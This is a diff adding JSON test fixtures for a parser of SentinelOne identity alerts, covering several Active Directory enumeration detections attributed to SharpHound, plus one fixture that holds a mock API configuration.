+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe",
+ "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+ },
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "process": {
+ "command_line": "Sharphound.exe"
+ },
+ "related": {
+ "hash": [
+ "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ ]
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935310-eb28-7a57-9c27-87843b2cec61",
+ "name": "AD Service Account Enumeration Detected",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_13.json b/SentinelOne/identity/tests/test_alert_13.json
new file mode 100644
index 000000000..a31ef954f
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_13.json
@@ -0,0 +1,49 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T08:45:50Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.",
+ "start": "2024-11-22T08:45:50Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T08:45:50Z",
+ "file": {
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe",
+ "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+ },
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "process": {
+ "command_line": "Sharphound.exe"
+ },
+ "related": {
+ "hash": [
+ "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ ]
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935310-c715-72c9-bbd9-dc1ff6a7ff1e",
+ "name": "AD Domain Computer Enumeration Detected",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_14.json b/SentinelOne/identity/tests/test_alert_14.json
new file mode 100644
index 000000000..7b9fc10e1
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_14.json
@@ -0,0 +1,49 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T08:45:50Z",
+ "kind": "alert",
+ "provider": "Identity",
+ 
"reason": "This event is generated when a command used to query or read the ACL's\\ Permission of any object in Active Directory.",
+ "start": "2024-11-22T08:45:50Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T08:45:50Z",
+ "file": {
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe",
+ "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+ },
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "process": {
+ "command_line": "Sharphound.exe"
+ },
+ "related": {
+ "hash": [
+ "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ ]
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935310-cb9b-770e-96ee-632d4d21520b",
+ "name": "AD ACL Enumeration",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_15.json b/SentinelOne/identity/tests/test_alert_15.json
new file mode 100644
index 000000000..d8a7c1f8a
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_15.json
@@ -0,0 +1,49 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T08:45:50Z",
+ "kind": "alert",
+ "provider": 
"Identity",
+ "reason": "This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.",
+ "start": "2024-11-22T08:45:50Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T08:45:50Z",
+ "file": {
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe",
+ "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+ },
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "process": {
+ "command_line": "Sharphound.exe"
+ },
+ "related": {
+ "hash": [
+ "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ ]
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935310-d4ba-7131-9e08-defa8b3aeb52",
+ "name": "Domain Users Enumeration Detected",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json
new file mode 100644
index 000000000..8a5217a55
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_16.json
@@ -0,0 +1,49 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T08:45:50Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This events is raised when a LDAP search Query is detected from the endpoint.",
+ "start": "2024-11-22T08:45:50Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T08:45:50Z",
+ "file": {
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe",
+ "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+ },
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "process": {
+ "command_line": "Sharphound.exe"
+ },
+ "related": {
+ "hash": [
+ "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ ]
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "ENUMERATION",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935310-dc47-75de-8925-5f026bd5a705",
+ "name": "LDAP Search Detected",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json
new file mode 100644
index 000000000..6d697a5be
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_2.json
@@ -0,0 +1,22 @@
+{
+ "input": {
+ "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n 
\"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": \"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n 
\"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": 
[],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 
200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n \"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": 
\"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n \"callbacks\": []\n}"
+ },
+ "expected": {
+ "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n 
